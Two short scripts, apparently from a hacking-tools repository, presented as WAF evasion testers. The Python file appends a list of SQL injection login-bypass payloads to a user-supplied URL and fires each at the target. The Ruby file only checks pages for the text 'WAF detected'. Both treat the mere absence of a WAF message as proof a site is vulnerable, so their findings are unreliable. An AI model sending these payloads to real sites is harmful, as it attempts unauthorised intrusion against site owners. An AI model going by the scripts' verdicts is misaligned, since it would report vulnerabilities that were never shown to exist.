File: hacking_with_python/WAF.py
import requests
from termcolor import colored

def test_waf_evasion(target_url):
    print(colored("[*] Testing for WAF evasion on:", "blue"), target_url)
    
    # Define payloads to test for evasion
    payloads = [
        "' OR 1=1--",
        "' OR '1'='1'--",
        "' OR '1'='1'#",
        "' OR '1'='1'/*",
        "' OR '1'='1'\"",
        "' OR 'x'='x",
        "' OR 1=1--",
        "admin' --",
        "admin' #",
        "admin'/*",
        "admin' or '1'='1'--",
        "admin' or '1'='1'#",
        "admin' or '1'='1'/*",
        "admin' and '1'='1'--",
        "admin' and '1'='1'#",
        "admin' and '1'='1'/*",
        "admin' OR 1=1--",
        "admin' OR '1'='1'--",
        "admin' OR '1'='1'#",
        "admin' OR '1'='1'/*",
        "admin' OR '1'='1'\"",
        "admin' OR 'x'='x",
        "admin' AND 1=1--",
        "admin' AND '1'='1'--",
        "admin' AND '1'='1'#",
        "admin' AND '1'='1'/*",
        "admin' AND '1'='1'\"",
    ]
    
    vulnerable = False
    for payload in payloads:
        url = target_url + payload
        print(colored("[*] Sending request with payload:", "blue"), payload)
        
        try:
            response = requests.get(url)
            
            # Check if response indicates WAF evasion
            if "WAF" in response.text:
                print(colored("[!] WAF Detected. Target may be protected.", "red"))
            else:
                print(colored("[+] No WAF detected. Target may be vulnerable.", "green"))
                print(colored("[*] Vulnerable payload:", "green"), payload)
                vulnerable = True
        except requests.exceptions.RequestException as e:
            print(colored("[!] Error:", "red"), e)
    
    if not vulnerable:
        print(colored("[*] Target does not appear to be vulnerable.", "yellow"))

def main():
    target_url = input(colored("Enter your target website URL: ", "blue"))
    test_waf_evasion(target_url)

if __name__ == "__main__":
    main()

File: hacking_with_ruby/WAF.rb
require 'colorize'
require 'open-uri'

def check_vulnerability(url)
  puts "Testing for Web Application Firewall (WAF) evasion on: #{url}".yellow
  response = open(url).read
  if response.include?("WAF detected")
    puts "The target website is protected by a Web Application Firewall (WAF).".red
    puts "This indicates that the website might not be vulnerable to common WAF evasion techniques."
    puts "Consider trying different techniques or conducting further analysis.".red
  else
    puts "The target website does not seem to be protected by a Web Application Firewall (WAF).".green
    puts "This might indicate a potential vulnerability to WAF evasion techniques.".green
    puts "Consider further testing to confirm.".green
  end
end

def test_vulnerability(url)
  puts "Testing for WAF evasion vulnerability on: #{url}".yellow
  response = open(url).read
  if response.include?("WAF detected")
    puts "WAF detected! The website is protected by a Web Application Firewall.".red
    puts "Consider trying different evasion techniques or conduct further analysis.".red
  else
    puts "No WAF detected! The website might be vulnerable to WAF evasion techniques.".green
    puts "Try testing for common evasion techniques like SQL injection, XSS, or protocol smuggling.".green
  end
end

def main_menu
  puts "Welcome to the WAF Evasion Tester!".cyan
  puts "Please select an option:"
  puts "1. Test for WAF evasion vulnerability"
  puts "2. Check if target website is protected by WAF"
  puts "3. Exit"
  print "Enter your choice: "
  choice = gets.chomp.to_i

  case choice
  when 1
    print "Enter the target website URL: "
    target_url = gets.chomp
    test_vulnerability(target_url)
  when 2
    print "Enter the target website URL: "
    target_url = gets.chomp
    check_vulnerability(target_url)
  when 3
    puts "Exiting program...".cyan
    exit
  else
    puts "Invalid choice! Please select a valid option.".red
    main_menu
  end
end

main_menu
